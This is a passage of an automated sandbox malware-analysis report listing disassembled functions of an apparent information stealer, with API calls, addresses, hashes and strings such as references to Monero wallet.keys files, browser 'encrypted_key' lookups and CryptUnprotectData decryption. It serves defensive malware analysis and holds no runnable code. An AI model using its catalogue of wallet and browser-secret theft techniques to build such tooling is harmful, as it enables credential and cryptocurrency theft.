                          • Instruction ID: d910416e87135a02df21188dea274fd6c4520ac9f441bf93b399fba75cf1a555
                          • Opcode Fuzzy Hash: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
                          • Instruction Fuzzy Hash: 98312CB1801618ABDF15EB90DC96FDEBB78AF54300F404189F2096A191DF746B49CFAA
                          Function 003987C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E28,00000000,?), ref: 0039882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00398836
                          • wsprintfA.USER32 ref: 00398850
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                          • Instruction ID: 6132db35c8259e01b110a38edf589d10516b125139312c7cb7f82438d3c5d01b
                          • Opcode Fuzzy Hash: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                          • Instruction Fuzzy Hash: 17214CB1E40608AFDB04DFD8DD49FAEBBB8FB48B05F104119F605A7280C779A904DBA1
                          Function 00398D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0039951E,00000000), ref: 00398D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00398D62
                          • wsprintfW.USER32 ref: 00398D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                          • Instruction ID: d4ca25468d2c90a7e9750373d6ed5c2b3ea3f849062d1a79ee7a9a51fc39b50f
                          • Opcode Fuzzy Hash: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                          • Instruction Fuzzy Hash: A6E08CB0A4020CBFE700DB94DC0AE697BBCEB0470AF000094FD0997280DA719E04AB96
                          Function 0038A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0038A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0038A6BC
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0038A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                          • Instruction ID: e5e054d027b8cc5a4822bbbd9da4983cee8c4a5d289f3d8ee53e6547ddb46a4e
                          • Opcode Fuzzy Hash: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                          • Instruction Fuzzy Hash: 9BE1EF728205189BDF06FBA4DC92EEE7738BF14300F508259F5167A091EF306A4DDBA6
                          Function 0038D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D481
                          • lstrlen.KERNEL32(00000000), ref: 0038D698
                          • lstrlen.KERNEL32(00000000), ref: 0038D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0038D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                          • Instruction ID: 922582bf5d6269c9307a87f0b82a4a81ca8ac03e21c9380f9b7b24045c087f1e
                          • Opcode Fuzzy Hash: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                          • Instruction Fuzzy Hash: F3910E728105189BDF06FBA4DC96EEE7778AF14304F504268F507BA091EF346A49DBE2
                          Function 0038D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D801
                          • lstrlen.KERNEL32(00000000), ref: 0038D99F
                          • lstrlen.KERNEL32(00000000), ref: 0038D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0038DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                          • Instruction ID: f3d36959b2809c2997caa072579169486ec5b1cd1aceca1a82d0fa4bb5b3b5b0
                          • Opcode Fuzzy Hash: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                          • Instruction Fuzzy Hash: EA8111729205189BDF06FBA4DC96DEE7778BF14300F504268F507AA091EF346A09DBE2
                          Function 0038F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003A1580,003A0D92), ref: 0038F54C
                          • lstrlen.KERNEL32(00000000), ref: 0038F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                          • Instruction ID: 3719ad843e5e3d7a7fc1604642f2b2dc8c043dfdf228baf735376802ea49d2f4
                          • Opcode Fuzzy Hash: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                          • Instruction Fuzzy Hash: 4751F171D106089ADF05FBE4DC96DED7778AF54300F408628F816AB191EF346A09DBE2
                          Function 003970D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                          Download Yara Rule
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0039718C
                          • s9, xrefs: 003972AE, 00397179, 0039717C
                          • s9, xrefs: 00397111
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: s9$s9$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 3722407311-539146638
                          • Opcode ID: fc1b36180251de4b0b18a2e01272086a557ce5a7ddfd7446df07479a99eb48dd
                          • Instruction ID: 13a29dedfaf7068a26bfa7e20c016dfd5947744571fe2821b2d2d78734ea82fa
                          • Opcode Fuzzy Hash: fc1b36180251de4b0b18a2e01272086a557ce5a7ddfd7446df07479a99eb48dd
                          • Instruction Fuzzy Hash: F2517FB1D142189BDF25EBA0DC82BEEB774EF44304F2445A8E2157A1C1EB746E88CF59
                          Function 00393560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 7c58670bd02fc95b46be8a150549ed2ed965eff4ab2d8fdf60dba7ae3e4ae15a
                          • Instruction ID: 1b1f3bca34cfe747b8235635e2dbc9e1f8b02962d6ef98fb3f25933b74f74ff4
                          • Opcode Fuzzy Hash: 7c58670bd02fc95b46be8a150549ed2ed965eff4ab2d8fdf60dba7ae3e4ae15a
                          • Instruction Fuzzy Hash: 3F411EB1D10109AFDF06EFE4D885AFEB778AB54304F008518E5167B290DB75AA05CFA2
                          Function 00389CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                            • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                            • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                            • Part of subcall function 00389B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                            • Part of subcall function 00389B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                            • Part of subcall function 00389B60: LocalFree.KERNEL32(?), ref: 00389BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
